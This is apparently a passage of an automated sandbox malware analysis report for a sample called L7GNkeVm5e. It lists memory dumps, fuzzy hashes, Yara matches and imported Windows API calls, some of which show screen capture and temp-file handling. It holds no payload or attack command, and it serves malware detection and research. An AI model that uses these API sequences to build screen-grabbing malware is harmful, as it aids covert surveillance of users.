                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70912B722490B34EEB6E463A847413EFEE15A422A570B079EF4F2CA1C5EF249579D630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction ID: ec94aa79f08bd08164d2b5423dcff0ea7252bc317f1a604181e33456defd2bd9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F59119722490F34AEB6A463A857413EFEE15A522A530B079AF4F2CA1C5FF24D178D630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction ID: 88a1db33e967ba489c1d9733615a485bedb907fdea3876f4c9150ae79c9fa902
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C9172722490B30EDB6E863A857413FFFE19A421A171A079EF4F2CA1C5EF14C57AD620
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                                                  • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                  • Instruction ID: 869e3716a90527ba70bfb1b50049f3c686e6012b386b5171d1a77a3f252da2e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 746137716C06386ADF385A68F895BBE73959B01B0CF100829F982DB2C0D715D97ECB56
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                  • Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                  • Instruction ID: 7bf624bf374a9a7bff39ab26a55b830d6b19f25cf907c5718daa42174f47bea1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 708152722490B34EEB6E463A847453FFFE15A421A530A179DF4F2CA1C5EF14827AD620
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction ID: a078e138eb3b71549bc8d4c945f0c2b94d674f7591f5353017a6a4ebc122f80e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2211EB772C007143D658CA2DD8B42BBA795EBC5228B2F827AF0414B758D732A17DD630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction ID: d05592e2a4a6a3c2db57902e51e15bb289740df8beb604fc5e8da98a4a907cb3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 161170727405109FD754DE55ECC1FA673EAFB8A320B298469ED08CB352D679E842CB70
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction ID: d3147169a0349a9176419bc51c0031599c2ee13a83e26a4a9cefd83b6132c670
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2301DB766506048FDF21CF24C854BBA33F5FB89215F5544B5E506D73C2E7B4A941CB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00402140
                                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00402147
                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                                                                                                                                                                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00402275
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                  • String ID: Tahoma
                                                                                                                                                                                                                                                  • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                  • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                                  • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 004025E8
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040260F
                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                                                                                                                                                                  • SetCapture.USER32(?), ref: 00402797
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004027CB
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00402803
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                  • String ID: hef
                                                                                                                                                                                                                                                  • API String ID: 2545303185-98441221
                                                                                                                                                                                                                                                  • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                                  • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                                  • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                                                  • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                                  • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                  • Instruction ID: ecb095d11d565b0a0869efcb38b72f685e08f1e5c842ce21f8257cf6df628438
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46B1CFB1D402159FDF229FA8C880BEEBBF6BF08304F144569F459A7251D735A855CF60
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                                                                                                                                                                                                    • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A621
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A643
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A658
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A663
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A685
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A698
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A6A6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A6B1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A6E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A6F0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A70D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A725
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0213A893
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139BFF
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C11
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C23
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C35
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C47
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C59
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C6B
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C7D
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C8F
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CA1
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CB3
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CC5
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CD7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A888
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8BF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8CA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8EC
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8FF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A90D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A918
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A950
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A957
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A974
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A98C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
